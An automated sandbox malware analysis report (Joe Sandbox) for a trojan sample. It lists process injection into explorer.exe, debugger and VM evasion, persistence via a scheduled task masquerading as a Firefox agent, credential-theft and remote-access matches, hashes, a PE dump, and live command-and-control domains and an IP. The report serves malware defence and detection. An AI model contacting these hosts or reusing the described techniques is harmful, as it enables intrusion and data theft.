                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00405424 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00405424
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00404C9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00404C9B
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_004070BE SetUnhandledExceptionFilter,5_2_004070BE
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00406D7C __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00406D7C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: vwhdahh.2.drJump to dropped file
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhMemory written: C:\Users\user\AppData\Roaming\vwhdahh base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: 5_2_00610110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,5_2_00610110
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeThread created: C:\Windows\explorer.exe EIP: 2951930Jump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhThread created: unknown EIP: 2981930Jump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeProcess created: C:\Users\user\Desktop\b8E3zd5AYc.exe C:\Users\user\Desktop\b8E3zd5AYc.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\vwhdahhProcess created: C:\Users\user\AppData\Roaming\vwhdahh C:\Users\user\AppData\Roaming\vwhdahhJump to behavior
                Source: explorer.exe, 00000002.00000000.367929094.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.317267616.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.378638951.0000000005910000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000002.00000000.367929094.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.317267616.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.349348910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
                Source: explorer.exe, 00000002.00000000.367929094.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.317267616.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.349348910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000002.00000000.367929094.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.317267616.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.349348910.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: explorer.exe, 00000002.00000000.348831070.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.367472459.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.317016427.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: GetLocaleInfoA,0_2_0040B61C
                Source: C:\Users\user\AppData\Roaming\vwhdahhCode function: GetLocaleInfoA,5_2_0040B61C
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\b8E3zd5AYc.exeCode function: 0_2_00407EE2 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00407EE2

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 6.0.vwhdahh.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.b8E3zd5AYc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.b8E3zd5AYc.exe.6e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.vwhdahh.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.vwhdahh.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.vwhdahh.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.vwhdahh.6115a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.386953278.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.437032585.00000000006B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.436985446.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 6.0.vwhdahh.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.b8E3zd5AYc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.b8E3zd5AYc.exe.6e15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.vwhdahh.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.vwhdahh.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.vwhdahh.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.vwhdahh.6115a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000000.368476198.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.386482803.00000000004F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.386953278.0000000002051000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.437032585.00000000006B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.436985446.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Native API
                1
                DLL Side-Loading
                512
                Process Injection
                11
                Masquerading
                1
                Input Capture
                1
                System Time Discovery
                Remote Services1
                Input Capture
                Exfiltration Over Other Network Medium1
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                Default Accounts1
                Exploitation for Client Execution
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                12
                Virtualization/Sandbox Evasion
                LSASS Memory421
                Security Software Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                Exfiltration Over Bluetooth2
                Non-Application Layer Protocol
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
                Process Injection
                Security Account Manager12
                Virtualization/Sandbox Evasion
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
                Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                Hidden Files and Directories
                NTDS3
                Process Discovery
                Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Obfuscated Files or Information
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common1
                Software Packing
                Cached Domain Credentials14
                System Information Discovery
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                DLL Side-Loading
                DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                File Deletion
                Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 715083 Sample: b8E3zd5AYc.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 30 Multi AV Scanner detection for domain / URL 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus detection for URL or domain 2->34 36 5 other signatures 2->36 7 b8E3zd5AYc.exe 2->7         started        9 vwhdahh 2->9         started        process3 signatures4 12 b8E3zd5AYc.exe 7->12         started        46 Multi AV Scanner detection for dropped file 9->46 48 Machine Learning detection for dropped file 9->48 50 Contains functionality to inject code into remote processes 9->50 52 Injects a PE file into a foreign processes 9->52 15 vwhdahh 9->15         started        process5 signatures6 54 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->54 56 Maps a DLL or memory area into another process 12->56 58 Checks if the current machine is a virtual machine (disk enumeration) 12->58 17 explorer.exe 2 12->17 injected 60 Creates a thread in another existing process (thread injection) 15->60 process7 dnsIp8 26 host-file-host6.com 176.124.192.17, 49697, 80 GULFSTREAMUA Russian Federation 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\vwhdahh, PE32 17->22 dropped 24 C:\Users\user\...\vwhdahh:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                b8E3zd5AYc.exe44%ReversingLabsWin32.Trojan.CrypterX
                b8E3zd5AYc.exe37%VirustotalBrowse
                b8E3zd5AYc.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\vwhdahh100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\vwhdahh44%ReversingLabsWin32.Trojan.CrypterX
                C:\Users\user\AppData\Roaming\vwhdahh37%VirustotalBrowse
                SourceDetectionScannerLabelLinkDownload
                6.0.vwhdahh.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                0.2.b8E3zd5AYc.exe.6e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.b8E3zd5AYc.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.b8E3zd5AYc.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.2.b8E3zd5AYc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.vwhdahh.400000.2.unpack100%AviraTR/Patched.GenDownload File
                6.0.vwhdahh.400000.3.unpack100%AviraTR/Patched.GenDownload File
                6.2.vwhdahh.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                1.0.b8E3zd5AYc.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.vwhdahh.400000.0.unpack100%AviraTR/Patched.GenDownload File
                5.2.vwhdahh.6115a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.vwhdahh.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.vwhdahh.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                6.0.vwhdahh.400000.1.unpack100%AviraTR/Patched.GenDownload File
                SourceDetectionScannerLabelLink
                host-file-host6.com22%VirustotalBrowse
                host-host-file8.com22%VirustotalBrowse
                SourceDetectionScannerLabelLink
                http://host-file-host6.com/0%URL Reputationsafe
                http://host-host-file8.com/100%URL Reputationmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                host-file-host6.com
                176.124.192.17
                truetrueunknown
                host-host-file8.com
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://host-file-host6.com/true
                • URL Reputation: safe
                unknown
                http://host-host-file8.com/true
                • URL Reputation: malware
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.349059881.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.367736313.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.317150379.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  176.124.192.17
                  host-file-host6.comRussian Federation
                  59652GULFSTREAMUAtrue
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:715083
                  Start date and time:2022-10-03 16:05:16 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 54s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:b8E3zd5AYc.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@6/2@4/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 85.4% (good quality ratio 81.1%)
                  • Quality average: 77.4%
                  • Quality standard deviation: 28.7%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 29
                  • Number of non-executed functions: 30
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                  • Not all processes where analyzed, report is missing behavior information
                  TimeTypeDescription
                  16:07:07Task SchedulerRun new task: Firefox Default Browser Agent 4E3843BFD359A85B path: C:\Users\user\AppData\Roaming\vwhdahh
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  176.124.192.17file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  cxkx7noXjk.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  file.exeGet hashmaliciousBrowse
                  • host-file-host6.com/
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  host-file-host6.comfile.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  cxkx7noXjk.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  GULFSTREAMUAfile.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  1F5u1OLUIL.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  gDi307GEL8.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  file.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  b3qxSkoyqZ.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  seEj6LCl8Q.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  WyUgKIIIA7.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  mOEDk7DTO8.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  vBhGoJ2eBE.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  ylAnmoMOHr.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  m7SrZ70aSv.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  ENxmvObIFB.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  DcLsmf1fcj.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  cxkx7noXjk.exeGet hashmaliciousBrowse
                  • 176.124.192.17
                  jAJNvSlmVJ.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  tBjXhpQk1M.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  VLF9ty2Rko.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  TtBAu0bmi5.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  Ka5xfjZmVX.exeGet hashmaliciousBrowse
                  • 176.124.192.220
                  No context
                  No context
                  Process:C:\Windows\explorer.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):147968
                  Entropy (8bit):7.0103245501974785
                  Encrypted:false
                  SSDEEP:3072:NVicgveaGAWt7HahxWSA0srMWbNFqID5yP5YO:NVOvaSA0srdNE8YP5Y
                  MD5:2072A0A726904AED8C39095F36EFD296
                  SHA1:29754DEA5A1FB0A2FF054279A3030D84579FAD15
                  SHA-256:9AE4D00A359AA5FACD231470B9A92B0542C6F8AFA6E981DCE7B171A08F635287
                  SHA-512:E431F61A4359854C1A69922331EDBDF98431114B2656FC63D0DECB266350F2417CD541511CA96901BF9DDAD38081B85A4F4D69ABF7C9543E4AE95359A596E7E2
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 44%
                  • Antivirus: Virustotal, Detection: 37%, Browse
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}..............N1......N'................D....N ......N0......N5.....Rich............PE..L..../.`.............................K............@..................................X..........................................P........K..........................................................0,..@............................................text............................... ..`.data...|...........................@....rsrc....K.......L..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\explorer.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.0103245501974785
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:b8E3zd5AYc.exe
                  File size:147968
                  MD5:2072a0a726904aed8c39095f36efd296
                  SHA1:29754dea5a1fb0a2ff054279a3030d84579fad15
                  SHA256:9ae4d00a359aa5facd231470b9a92b0542c6f8afa6e981dce7b171a08f635287
                  SHA512:e431f61a4359854c1a69922331edbdf98431114b2656fc63d0decb266350f2417cd541511ca96901bf9ddad38081b85a4f4d69abf7c9543e4ae95359a596e7e2
                  SSDEEP:3072:NVicgveaGAWt7HahxWSA0srMWbNFqID5yP5YO:NVOvaSA0srdNE8YP5Y
                  TLSH:7DE3E02135B0C432C66386B01DA1D6D0BA7FF551ABB199773B6D076E0F216C1AE3A327
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L..../.`...........................
                  Icon Hash:aedaae9ecea62aa2
                  Entrypoint:0x404bf7
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:TERMINAL_SERVER_AWARE
                  Time Stamp:0x609A2FBD [Tue May 11 07:18:21 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:0
                  File Version Major:5
                  File Version Minor:0
                  Subsystem Version Major:5
                  Subsystem Version Minor:0
                  Import Hash:2d5ec24fb9d2ee4cf8208f9e16125d4f
                  Instruction
                  call 00007F1EE89CEE0Bh
                  jmp 00007F1EE89CB99Dh
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  mov ecx, dword ptr [esp+04h]
                  test ecx, 00000003h
                  je 00007F1EE89CBB46h
                  mov al, byte ptr [ecx]
                  add ecx, 01h
                  test al, al
                  je 00007F1EE89CBB70h
                  test ecx, 00000003h
                  jne 00007F1EE89CBB11h
                  add eax, 00000000h
                  lea esp, dword ptr [esp+00000000h]
                  lea esp, dword ptr [esp+00000000h]
                  mov eax, dword ptr [ecx]
                  mov edx, 7EFEFEFFh
                  add edx, eax
                  xor eax, FFFFFFFFh
                  xor eax, edx
                  add ecx, 04h
                  test eax, 81010100h
                  je 00007F1EE89CBB0Ah
                  mov eax, dword ptr [ecx-04h]
                  test al, al
                  je 00007F1EE89CBB54h
                  test ah, ah
                  je 00007F1EE89CBB46h
                  test eax, 00FF0000h
                  je 00007F1EE89CBB35h
                  test eax, FF000000h
                  je 00007F1EE89CBB24h
                  jmp 00007F1EE89CBAEFh
                  lea eax, dword ptr [ecx-01h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-02h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-03h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  lea eax, dword ptr [ecx-04h]
                  mov ecx, dword ptr [esp+04h]
                  sub eax, ecx
                  ret
                  cmp ecx, dword ptr [0041FADCh]
                  jne 00007F1EE89CBB24h
                  rep ret
                  jmp 00007F1EE89CEDF3h
                  push eax
                  push dword ptr fs:[00000000h]
                  lea eax, dword ptr [esp+0Ch]
                  sub esp, dword ptr [esp+0Ch]
                  push ebx
                  push esi
                  push edi
                  mov dword ptr [eax], ebp
                  Programming Language:
                  • [ASM] VS2008 build 21022
                  • [ C ] VS2008 build 21022
                  • [IMP] VS2005 build 50727
                  • [C++] VS2008 build 21022
                  • [RES] VS2008 build 21022
                  • [LNK] VS2008 build 21022
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xe0fc0x50.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x17b0000x4bf8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x12100x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c300x40.text
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000xdbf60xdc00False0.48618607954545456data5.924373758356647IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .data0xf0000x16bd7c0x11600False0.8880114658273381data7.5838946029468435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x17b0000x4bf80x4c00False0.7270764802631579data6.372265355834209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  RT_ICON0x17b2b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
                  RT_ICON0x17bb580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0
                  RT_ICON0x17e1000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
                  RT_STRING0x17f3a80x42data
                  RT_STRING0x17f3f00x280data
                  RT_STRING0x17f6700x3cedata
                  RT_STRING0x17fa400x1b2data
                  RT_ACCELERATOR0x17f1d80x80data
                  RT_GROUP_ICON0x17f1a80x30data
                  RT_VERSION0x17f2680x140MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
                  None0x17f2580xadata
                  DLLImport
